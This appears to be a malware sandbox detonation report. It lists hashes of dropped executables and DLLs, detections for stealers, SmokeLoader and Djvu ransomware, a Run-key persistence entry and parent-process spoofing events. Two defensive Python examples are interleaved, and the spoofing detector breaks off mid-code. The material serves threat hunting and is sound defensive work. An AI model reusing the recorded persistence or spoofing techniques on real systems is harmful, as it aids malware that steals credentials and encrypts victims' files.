SHA512 03d72c912f495a4a12c023af0a6ec55e2286209e9b4edd38235b30739aec01fed3d5cedd38a20d59fbf39f58dd46a0eb8b1388636d098a0cc0a75f380acacc53

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 2e8359e8c463da40da01b2a5a294d907
SHA1 052c54a09e8bc8471f49db6d4963d9f90cccd98b
SHA256 5b878a3ef3cdc8dd2df831f63bc0a9478760afdb1abc215b9466dfbaa62c5b59
SHA512 5a7f915a5f549734a4156cd42115a887b529843fe6cbb851e97190b825813db83a8dd244d4e83581e7851012235a657d22a9e41924204948a8503187c152c5c1

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 182dc2ca1de5d699663cacd788a387eb
SHA1 48b64feb432715cea9c8919691e98e0911e36f1b
SHA256 5c82e4af3350bf40742da1ad4b421d0dc13d6c0acd7ddb511bcb0b53e44c4829
SHA512 7191bebab7ec72e5f4a2adf26a375d8ff8d908504ef83bfecc358fa8bc753ad66b795f36db7d898247fca146d6cdd102a6125a927250573fdb3f583adce37108

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build2.exe

MD5 47704f454af8641dac1af2e2768d7881
SHA1 e3341bfdec84f69684aecde18cab2864519c7728
SHA256 a6a9375dd6e3b285bc6d65536a151a47dd136aced8180492f5ed6a391edf0d64
SHA512 9aea598ee30342a88fedf5eca2b104e8c5587cd284bd43229581b04497c60e6a71e5392a171a5dfbe88a2e41269434922e21c3f7f9682e2ea10b27b104606b25

memory/1408-172-0x0000000000400000-0x0000000000644000-memory.dmp

\Users\Admin\AppData\Local\a1b12734-9675-47c5-8c6f-47d3406df0e3\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/2204-183-0x0000000000400000-0x0000000000537000-memory.dmp

memory/876-188-0x0000000000950000-0x0000000000A50000-memory.dmp

memory/1944-187-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/876-190-0x0000000000220000-0x0000000000224000-memory.dmp

memory/1944-191-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1944-194-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1944-196-0x0000000000400000-0x0000000000406000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 d35c806c95b926208b06f305860de044
SHA1 fd111b2072749c0e2b3f1bb7102e4fbcdd8b931b
SHA256 722325dfc7e0a3d8b9c5bcf978e54f9a90a83ffa5d14372a51dc7c3609fee061
SHA512 cb5f66f83bd6a8ddad6d740479d17352d3a8249ab6fec7ea0ee071dcc7f9855ed378dee61bb65e92d272e3fb8187282ce08d0694550cfa610bf6e6508ec5b6a6

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 61350605145dd6149d79e76ebd1b0b58
SHA1 09f00ea3c06247143eb128f5bc6df2745a374c56
SHA256 4c5532c75e2dcd198ca6607cfe6a3bafb74b808a48eadbbd6170b2c271e00d1f
SHA512 7f25782d415093b0fe6f089423d413e6c6c1fa855a3dac6c28c4819b11444c81317d61eba6654b1e6f7bb6108273bfdca0026ded938a8b253082dc15945b981c

C:\Users\Admin\AppData\Local\Temp\8410.exe

MD5 4404c55ec80e94d9667fc99d1ac260d0
SHA1 c2d926a7a667e85382c1b557114b75c60dcf4dc6
SHA256 8293f4bee7196717755e29f6631c00574adcdaf994966ddb02a85e80aab0770d
SHA512 ec416b56cfd1e67e9d2e40a10ec05071ab9ad13731568ef004dcba3ec7bc0fb0452804e7b1f5f0497760f737a63a2d90e6216654f62e89d335f3acb731228a26

memory/2584-216-0x0000000000FC0000-0x0000000001CA5000-memory.dmp

memory/2584-230-0x0000000000140000-0x0000000000141000-memory.dmp

\Users\Admin\AppData\Local\Temp\8410.exe

MD5 8d2c6189a11b8cfa16842a17277a1555
SHA1 c1d74923042bf72a4c137427cf45904181a45454
SHA256 25d63431a3cf6596694bd494bad0a1e632f0bc8a1e2e545351c4a8004d88f007
SHA512 230f43a883799fc564e23989ce9e0d05b8ea985e90eadea84d2e58ce3486c5d7481e0bf555bf1176665e349dd9b67529444780f4bbfb53d138759310cab1041b

memory/2584-255-0x00000000009C0000-0x00000000009C1000-memory.dmp

memory/2584-254-0x0000000000FC0000-0x0000000001CA5000-memory.dmp

\Users\Admin\AppData\Local\Temp\8410.exe

MD5 a90326038e2962823462150d63ff1f0d
SHA1 b2494f3015dfaa1c4456a932d2512e0b2b77d37c
SHA256 0c42a85f289c78052fb33baf5bae3605fdcdf71fcc9502d483c5505879c6096e
SHA512 57034ed505d87bee855329436ff36d23222fcbbfdfc1c5c02fcb054871ec3f1c9651f0222c076901a3f8e8c138b8cede36b94a1e5b5ec0500204e5ede19ee634

\Users\Admin\AppData\Local\Temp\8410.exe

MD5 f2b5b16453d7f5b1e82a92e8f09f35e5
SHA1 bdc97742e683fb5a89c55245eebd924c3c090674
SHA256 286075aba343ce1c880d084a73d5ce174dd4eb53188af218aa8b4b6d461df339
SHA512 5d0bc07aa8ce7ae7a69ea214a4323264ba415c9fcf21a8b9c265c1a47f98f4c0a25e98b9dccc82dbd50cc871ab684dab380d1c330733e557951747f9b7aa6136

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 4b2610479dfd5a7aa1582d76b712e84b
SHA1 43751f499df4e72c67450ccbdfb542130cceb709
SHA256 ef485836ccc0e06ead9ddf0bf9df03494600761cb2f181d84944824272301fd0
SHA512 d8fee9d6de05e87759b58be074f2bf01a3130f0a18e8fcb20e3cda404cac2671a2227f446c1211d075486c7e064df0db9e283a097c89c678a288996180ce112d

memory/2708-263-0x0000000000940000-0x0000000000A40000-memory.dmp

memory/2584-228-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2584-226-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2584-225-0x0000000000080000-0x0000000000081000-memory.dmp

memory/2584-223-0x0000000000080000-0x0000000000081000-memory.dmp

memory/2584-221-0x0000000000080000-0x0000000000081000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BE25.exe

MD5 0ce50eaaeccf509f400fd2d8ca26990d
SHA1 f390e6aa7a9052c0889d81da71de8e41cbdbcc0b
SHA256 a31560f54a5c8ad5dfcadec5c1c7b9c2d94db474a28c8a24f873e663ada8362e
SHA512 8b00389817b576affa342c2ad0aca7c9d3c04df95f6f40520a7ae145d21aa8a6b940bd155c6da39f6d2e3e5d42ffdde71e00dd1a792fe7549ba9c06a989d2543

\Users\Admin\AppData\Local\Temp\BE25.exe

MD5 ac3e7ec616235bbd36d1c4a9ace14560
SHA1 6c119d810a8b63a364c49a5d03d2315b27b07efc
SHA256 9a5e5d9fb693579c9bf43285fa0ad661bdfa2109cabe84babccea14d9e94fc5f
SHA512 f060ee8631eb1f584d01d9bd54f898e3c325882d65ef5451f7db016bbf240c1346a1a46681021d8ff1437808c97597720db85fb358be394deae1c925c53a6f07

memory/2584-283-0x0000000000FC0000-0x0000000001CA5000-memory.dmp

memory/2708-287-0x0000000000940000-0x0000000000A40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2C15.exe

MD5 73dd1ad39b4674736d4024b9a9af5a91
SHA1 9f117817db7296dc3b62c9c7531f55f7d520a6f3
SHA256 6db60e40c06306984110f5b1fda1c00094a9d4c64a41280c09f811aa81159690
SHA512 91a69b0e40ef7702af49919487cc0c6b41afb1b4b9d2f1558662b266b07fb153582b42f3f562fad035eeacb6d2bf9107a08a9011fe58de2ca7bf59e9be162d36

C:\Users\Admin\AppData\Local\Temp\2C15.exe

MD5 1f771a4090c93406778128c2cef63e86
SHA1 1134930d91881812d2e028332e23ed35a09a39da
SHA256 2040f8cf3506e2e7c964ac477febc542dfc935577c37eafce931ebdb12c85e78
SHA512 443767ac465ab94d4a1907519823eb2f628b607c91810d9a20740d65527af06879bb0b2bae024f064e57a105b1d7fed85d28c2c002753847743fce1759cea31c

memory/956-300-0x00000000000A0000-0x0000000000542000-memory.dmp

memory/956-312-0x00000000020F0000-0x00000000020F1000-memory.dmp

memory/956-313-0x0000000002190000-0x0000000002191000-memory.dmp

memory/956-311-0x00000000026C0000-0x00000000026C1000-memory.dmp

memory/956-310-0x0000000002350000-0x0000000002351000-memory.dmp

memory/956-309-0x00000000022F0000-0x00000000022F1000-memory.dmp

memory/956-308-0x0000000002180000-0x0000000002181000-memory.dmp

memory/956-307-0x00000000007E0000-0x00000000007E1000-memory.dmp

memory/956-306-0x0000000002810000-0x0000000002811000-memory.dmp

memory/956-305-0x0000000002340000-0x0000000002341000-memory.dmp

memory/956-304-0x00000000025D0000-0x00000000025D1000-memory.dmp

memory/956-303-0x0000000002570000-0x0000000002571000-memory.dmp

memory/956-302-0x00000000000A0000-0x0000000000542000-memory.dmp

memory/956-301-0x0000000076FB0000-0x0000000076FB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31C0.exe

MD5 bbd27e1b962190bbe8849de42149e8c1
SHA1 4ae74ff009d786abe56815f4fd089c0bf2ad923a
SHA256 e983cd66c6309610e5b7e7d668039323967c9a7441cb152e61bc2f20db508f15
SHA512 cd7d86d9765dc65556aecafd8a116d9b40bf563955091a5e30950f856e570b387a7ed27a5afc8f5785d4235347c6996fff484ce0209545104fb03f2d125e7464

C:\Users\Admin\AppData\Local\Temp\31C0.exe

MD5 d5ab9550784d1bf26ab0420b1d9ca51f
SHA1 b1c7311fdca0498673f8133b96b710c4d36d846e
SHA256 3904bbc346622b40fe8f63c6541cf976f22ccaef980b2f971fbbecfb4cefe678
SHA512 c028dce36516e23bbcc1d8aec65c28ba1cb43689b1f277e6f86ba12391fe11484809d6e9b2db77587f413b1732da239fec2d188563b3512c0baeecae254a3948

memory/956-321-0x00000000022E0000-0x00000000022E1000-memory.dmp

memory/956-322-0x0000000002870000-0x0000000002871000-memory.dmp

memory/956-323-0x0000000002820000-0x0000000002821000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2C15.exe

MD5 9262b7eac1014aab9d4cea11b3217cc4
SHA1 3c8c7be8f03fb6ce0e244a324b490a513d2157aa
SHA256 110c427fc5905a6aede313a0606128865744502934aec6942cd47dcf4accb7f9
SHA512 056a2694faf3b2ab450f867f6f513f14278cca9493d802ae1121bbb0e9440394efbb35580a2034d39d782e57d89b7b5f22f2ad4961a6481c7ba0408ef3cab50d

memory/956-329-0x0000000002B00000-0x0000000002B01000-memory.dmp

memory/956-332-0x00000000000A0000-0x0000000000542000-memory.dmp

memory/956-331-0x0000000002560000-0x0000000002561000-memory.dmp

memory/956-324-0x00000000007F0000-0x00000000007F1000-memory.dmp

memory/2040-336-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/2040-335-0x0000000000220000-0x000000000028F000-memory.dmp

memory/2040-334-0x0000000000590000-0x0000000000690000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3BCF.exe

MD5 f727c0754ddda4ed6354375ab748735b
SHA1 2ad7d52a12f896817edfe511ec26212580dc5958
SHA256 661a2b6049a9d139ab8ae094b25ea0cfd3f24e7aa18190ae11e23f9e97753899
SHA512 1193780f969653123b41f41f9f6aeb1b71752d80337fd01928dfcee4e370b49fc24da0bfab6bcfb710019301bea3800db90250b46bfae4a45e2ad6a6d73a5ce3

memory/1540-343-0x0000000072880000-0x0000000072F6E000-memory.dmp

memory/1540-342-0x0000000000180000-0x000000000021A000-memory.dmp

\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

MD5 45b7c3de508bccbf27e3dc658c52290f
SHA1 29d45efb52ca25eea4371764443ab323b3aa8b90
SHA256 06a54cdd36bf0c244d02ae7c20886cfe545fc5df8aa6a353b4bb49e6044a76a0
SHA512 afcd601fe8aa43760122e2463b7366541504d1e2438726e1d4444b6f9fa323f82eb81f09e6d66cd446fe6a557b45085f827cd2453de455424ef625e44f8f6d14

C:\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

MD5 0de19cd17462ea79db1a5e5fd1d7f59f
SHA1 d2b313dcfbda9a04475fc01182336b52846bbe3b
SHA256 c7a85c09379538ca0f5e856eb5dcf63d949c9d1841e12cb8c5fd42c780f1fe3b
SHA512 0aecaaa2d8488c3150b2349c260782c13619c5b871f7559496da8fa53e8a18a3fff39603d65516f53709c95108672fd08da8a1249b58aaba92c19ad80411d40c

memory/2040-361-0x0000000000590000-0x0000000000690000-memory.dmp

memory/2040-362-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/1540-354-0x0000000005080000-0x00000000050C0000-memory.dmp

\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

MD5 c9a6c6fcf7d7d38f9ff025275620fb90
SHA1 74e7187e32f50016390a89097396cdbe7459de72
SHA256 e4464b0edf5f5e87b3772e6bf61bcdfc363c7398acf643f785ba9ee4949d8ffb
SHA512 63576b85f4843a346a2a253ff4a1ef0b81341a05935167973e02fb5765f5b32789fdfe5076565866328031acbdf61ede45d4bc24ddf4e837c7e046f4293a0855

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FIFYCI9A8YUT80ZM1MS6.temp

MD5 76097c54fb11372f9d34d446d4cb9fe7
SHA1 a048ac1b087c29a15be166ad888047af16b8c07a
SHA256 1cbe5691eb7621a93e37e9d473f274d63cb0922243f755817b909d4ea78904de
SHA512 b2994fef29b4cd3d26efed28fe4fbd2b2b884b8e619a4bb4132fc1ed2acae26161d6ebe0cc3dd33ad532faf81103862e997e98cf8600d9f4579fae2facd127b2

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2100-371-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/2040-346-0x0000000000570000-0x0000000000571000-memory.dmp

memory/2952-373-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/2952-374-0x0000000002770000-0x00000000027B0000-memory.dmp

memory/2100-375-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2952-376-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/2100-378-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2100-379-0x0000000002730000-0x0000000002770000-memory.dmp

memory/2100-377-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/2952-380-0x0000000002770000-0x00000000027B0000-memory.dmp

memory/2952-381-0x0000000002770000-0x00000000027B0000-memory.dmp

memory/2100-383-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/2952-382-0x000000006EDA0000-0x000000006F34B000-memory.dmp

memory/1100-386-0x0000000000400000-0x00000000004AB000-memory.dmp

memory/1100-385-0x0000000000570000-0x0000000000670000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 93ce2fd9b704b9f5cb02c3d9db8dc8c8
SHA1 b9e223acdc08d3fd59e0899f2c7dfe3119d9decb
SHA256 dbfd4395f2d616922e3c0003f1d16815cf4b23349ae36222aeff63e884c518b7
SHA512 1867ecf1da50adba7a2718fdc6997114688943096b6fa21c96e5cc5e440acfead98f593fd322e13db7b6d628f343500df80bdc3d782979c94170aafc9d100644

C:\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 e5b83dfe8ffb9ddf677ae3221581d00a
SHA1 d82899d94e0d9eca7ac0a6b53bc311aa6458b9e5
SHA256 df9d57daad9e02541a7e21af4d39428910a96570471bb0e68d7f52be0d5b017a
SHA512 07e6ec75b5e84defbdd0ddda7ecbfa184c1491867d0b3ebd06fbe1b75fc1d40ec80a04cd41e5330ed781f1fab0091e8d7ff7ec631bd87df814b8f20e79f7df7b

C:\Users\Admin\AppData\Local\Temp\452737119395

MD5 d3cbc6fa47d52868cdfcd66ae87c213b
SHA1 9a6338010aabbeb94008dc817a768434f58833a9
SHA256 8d252f852e3d7e6cb20c199fba553cdc10e76a222ba66c7e3052258536d78bf3
SHA512 f2eaf5068baabb9dfa1a59d3713183e9a145263bd270c499477f333aa5c3d1bc36067ce2a5b547bfb0407e782e2fe7c3fd95d48f38b6c869a42ca303f990ab86

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 8f13410c0a7e08cbe20d4437025ace23
SHA1 340c7cf06515d5210241de4d831e47786257aefc
SHA256 55ab14dd23f2be00ef8964e7972c5e8452c5a5e7426e7fe22f83b408ea80b1b3
SHA512 f330782ef1b47704cc932fd444d0de9109eac7118b845aa3eddb85cef50f5ebe0fabd562d3f46201f9b2c51c71fdd2bfe038b8ab43e255322f45a8b873c716e7

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 00d05fec148cc541b7909edc001a5052
SHA1 0bdeaa4eea758d3d07e78286bc10d88e439cbf0e
SHA256 9c9dbcf86e7c007389e51390010a732c50545ff4afad8431ff644bf6c2680560
SHA512 35eeaea9d6fde52a57a91b3ea56257c05f8bb7433340fbb5cd138d85a42a3dc9d81cdf53286d1765b8ae83c9a64afad9ffb67707fff946bf6d567b826322d86b

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 6abbbdfe613dfd85ab61d92a740eac30
SHA1 c257d8e463944cea3889711268548c4e8f06ec30
SHA256 27c13ee9cabe9110c7bdf2e9d309bc6af452167fb91adbb1c50242e8edfd0c3e
SHA512 312541ccd892ff4c5c1b902775728de0bc73335f8a7403a273a55e605aaebd3cbdc5dc25298daa70e1324618c6cbe89a0e243d6f9af502739b2b095b1859c967

\Users\Admin\AppData\Local\Temp\1000005011\blyat.dll

MD5 ebc36f61b14556db42e89c3117d992a4
SHA1 eef2cb9d3d5ea206337c963ee9761505c8fa59b4
SHA256 94c51d53c7230f05c3d4897ac51f5c470f80459b353a8b7d80d741a46444b585
SHA512 5bb65a928e627c1fb02f59e363ce429856e3ff5861ff882c2a98458d5ca46c986930f5ef5b2b2e6945d5807362df8e9be0daafba499be6672c79f5be3091773a

\Users\Admin\AppData\Local\Temp\154561dcbf\Dctooux.exe

MD5 177c56527c4940875b2d8e5b3e85ccb5
SHA1 88faa0698ec92eeb2b8e95912cd6388576029d36
SHA256 71b5b527a3c40dba6edd886afba94aefd705c84ca52a23a2a745ee13ea302f9c
SHA512 6a2452621938126e35394e12e66bea798cd8fa99bd0b07dff04a720b1a1cd7436bdfdb4b1726f2456ec4576ef147b8434e858a1e5c6a167fe99624057af541d8

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 6c5bd9f974a80bfe17fe7797da102c94
SHA1 51b0f76e949a607fe9e41997183417ad81e3a6e6
SHA256 8d813e5be9e13cb4f579a6485aaa586c358b420d28533f13b9be89352b1b7bff
SHA512 f4e8e71a9f298bf2f47dc7ceca10215ea48b560397fc7deb217d51e799a28c4648b710fb13419526d7d6a22a30d7168729f37a58253659edfd5cd4e421bae507

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 eb07f6871ab2b76e783be67d82705d38
SHA1 fa890da45099be2f4887d1824c78bba60cf80878
SHA256 5c10409945e770bf0cf504c398b04e2730275ca85e0c688a74cd3345bf38d007
SHA512 92e24b8bbefada8772af83cef78b1f32cce0a2e875dfdb8681ef2548969ed030ac5729ba71a17610defe7607c59de54d26cc7dc7126d4e1bd8c1796829d75be2

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 88889e383d73b901b559f662d5b7f8eb
SHA1 07694eea3c59b665095b5987cd8d88d88207fa02
SHA256 066e4a9bf2a0ffb2f567c1735692286f8ae9537f3487c2c1467f2ad7cb41f7aa
SHA512 2cac3ebdcb2e45ec760d47f0ed7fa4b641dca617dd7ceb9a9be0eeae5060556eb294e1aa1325e5d989869eea5360a6b7835e597d44812f9dcf079d1c7850868c

\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 5f0905646c7a71286813d48ffef36862
SHA1 af2554826138ab581797f52567e8ad8d270f873e
SHA256 ed18f280fc00d91b509597ef8092ce72ecccf4fe4908406ea29a72ba63850180
SHA512 0ea4c8475d1a9df32176af642d974a9d95ea081ad776936b2722489aba73c64737191d4d81991c5befc48f1c324d93dfc4f5f38ef1eccbd335bfae8c2f2d0f59

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\cred64.dll

MD5 4ca3e9ec88dd8a49e37e8ac89bf037ac
SHA1 049666797a01e7d04400b280c1d6d6b0a0c6d4d0
SHA256 91c3ac68ba013aad7fcb77da825c93ff078b0cf980c792c244264e0de453ee5d
SHA512 3fe35745f793c112431e22abe070eb2e7bf9701f1f41c12537f690443b4327b66367e9e51f4a6b5fbffacf6ffe740a8649c96bcb56cd98a512210a7d899595f7

C:\Users\Admin\AppData\Roaming\810b84e2bfa3a9\clip64.dll

MD5 ca684dc5ebed4381701a39f1cc3a0fb2
SHA1 8c4a375aa583bd1c705597a7f45fd18934276770
SHA256 b8c5ad09c5b62fa8d8bcb8e1c317700274b4756d04fc964ccae38103c318ddd2
SHA512 8b414799e37d50f664e04e704ab06a8f6f25cb9f9c24f157e998a72aad9c0a0cd9435b42c629dc26643f039725d22a89ca3468dc39009d11d910420a80e9c510
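The file listing above mixes three kinds of entry: memory regions with no digests, real dropped files, and handles the sandbox could not read (the `\??\PIPE\srvsvc` entry carries the digests of zero bytes of input). It also reports the same path repeatedly with different content, because the droppers overwrite their staging files, and spells one file both as `C:\Users\...` and `\Users\...`. The parser below turns a listing in this format into a hash index suitable for hunting, skipping the entries that would only produce noise. It is an added example, not code from the report or its sandbox; the sample input is an excerpt of the listing above, and the drive-letter normalisation and the zero-byte check are the author's choices, not something the report states.

```python
"""Parse a sandbox 'Files' listing (path line followed by MD5/SHA1/SHA256/SHA512
lines) into a deduplicated hash index for hunting."""
import hashlib
import re
from dataclasses import dataclass, field

# Excerpt of the listing above, used as sample input.
SAMPLE = r"""
memory/1940-1-0x00000000008D0000-0x00000000009D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\67E7.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\7DA9.exe

MD5 f772938618715239d925c7b7943c5582
SHA1 0312bdaca177849dea6df975a70e768ee56cccf4
SHA256 a2c5938f8e1aeebff52a3077b1bf3ddb8666ea539886846fb64db6c012c8cd33
SHA512 6a259c1ced90aded5dc99173831cff6314287af90e9181cbc701221f93f2407714e991ee3881c4e79409081179c1a53e67e5a756f793bfd40fa9f76693a31213

\Users\Admin\AppData\Local\Temp\7DA9.exe

MD5 de3d52b77c63c7b3fdc9e558effbd4af
SHA1 6f92f2c1115bca65f25ea9af3921699d97f72128
SHA256 05a6a2218409af6a0f6091fa3c43d878597c1d078cad8d867d2c36dd9627e10e
SHA512 e91f6b1c4a223c44cfeb480518089bc3a959101aefa8c56c06adee0b33a5243b56bde781aaa1f1b1db31c9aca704a85e9bca3ee77f3667ddba3e928a2916f3d0
"""

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$")
DRIVE_PREFIX = re.compile(r"^[A-Za-z]:")
MEMORY_PREFIX = "memory/"


@dataclass
class Artifact:
    path: str
    hashes: dict = field(default_factory=dict)

    @property
    def is_memory_dump(self) -> bool:
        return self.path.startswith(MEMORY_PREFIX)

    @property
    def is_empty_input(self) -> bool:
        # Digests of b"" mean the sandbox hashed a handle it could not read
        # (the srvsvc pipe above); they match every empty file on every host.
        return self.hashes.get("SHA256") == hashlib.sha256(b"").hexdigest()


def normalise_path(path: str) -> str:
    # The listing spells one file both as C:\Users\... and \Users\...; drop the
    # drive letter (an assumption: single-drive analysis VM) and case.
    return DRIVE_PREFIX.sub("", path).lower()


def parse_files_section(text: str) -> list:
    """A non-hash, non-empty line starts a new artifact; hash lines attach to it."""
    artifacts, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            current.hashes[m.group(1)] = m.group(2)
        else:
            current = Artifact(path=line)
            artifacts.append(current)
    return artifacts


def build_hash_index(artifacts) -> dict:
    """SHA256 -> set of normalised paths, keeping only hashes worth hunting for."""
    index = {}
    for a in artifacts:
        if a.is_memory_dump or a.is_empty_input or "SHA256" not in a.hashes:
            continue
        index.setdefault(a.hashes["SHA256"], set()).add(normalise_path(a.path))
    return index


def paths_with_multiple_contents(artifacts) -> dict:
    """Paths written more than once with different content, i.e. staging files
    a dropper overwrote (7DA9.exe above). Dedupe by hash, never by path."""
    by_path = {}
    for sha, paths in build_hash_index(artifacts).items():
        for p in paths:
            by_path.setdefault(p, set()).add(sha)
    return {p: s for p, s in by_path.items() if len(s) > 1}
```

Run over the full listing above, the index is what to feed to an EDR hash search, while `paths_with_multiple_contents` tells the responder which on-disk paths cannot be trusted to hold the sample that was analysed.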

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-15 01:05

Reported

2024-03-15 01:10

Platform

win10-20240221-en

Max time kernel

300s

Max time network

301s

Command Line

C:\Windows\Explorer.EXE

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\66153edd1d485c48719a11adca5f7f3f9fa54161dbc8325f9e8bb107beba2029.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-682446400-748730298-2471801445-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ea10023c-c3fb-47cc-92b7-f6d1ae94c05a\\FD24.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\FD24.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Lumma Stealer

stealer lumma

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2792 created 3820 N/A C:\Users\Admin\AppData\Local\Temp\25500\Http.pif C:\Windows\Explorer.EXE
PID 2792 created 3820 N/A C:\Users\Admin\AppData\Local\Temp\25500\Http.pif C:\Windows\Explorer.EXE
PID 2792 created 3820 N/A C:\Users\Admin\AppData\Local\Temp\25500\Http.pif C:\Windows\Explorer.EXE
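The signature above records Http.pif (PID 2792) creating a process while naming Explorer.EXE (PID 3820) as its parent. The new process carries whatever parent the caller supplied through the parent-process attribute, so any tool that builds its tree from the recorded parent will show the child under Explorer and lose the link to Http.pif. The caller itself is still visible in the kernel's process-start event, whose header identifies the process that made the call. The example below, added here and not part of the report, applies the same check as the signature to a list of constructed events: flag every creation where the calling PID and the recorded parent PID differ, keep an allowlist for components that re-parent by design, and walk the creator chain instead of the parent chain when reconstructing lineage. The event records, the child image of the Http.pif creation and the allowlist contents are assumptions for illustration.

```python
"""Parent-PID spoofing check: compare the PID that called NtCreateUserProcess
with the parent recorded in the new process."""

# Constructed process-start events. creator_pid is the caller (the PID in a
# kernel ProcessStart event header); parent_pid is the parent written into the
# new process, which is what process trees normally display.
EVENTS = [
    {"creator_pid": 3820, "creator_image": r"C:\Windows\Explorer.EXE",
     "parent_pid": 3820, "new_pid": 4100, "image": r"C:\Windows\System32\notepad.exe"},
    # The behaviour reported above: Http.pif (2792) creates a process and
    # names Explorer.EXE (3820) as its parent. The child image is assumed.
    {"creator_pid": 2792, "creator_image": r"C:\Users\Admin\AppData\Local\Temp\25500\Http.pif",
     "parent_pid": 3820, "new_pid": 4120, "image": r"C:\Windows\SysWOW64\cmd.exe"},
    # Legitimate mismatch: the AppInfo service (inside svchost.exe) creates a
    # UAC-elevated process with the requesting process recorded as its parent.
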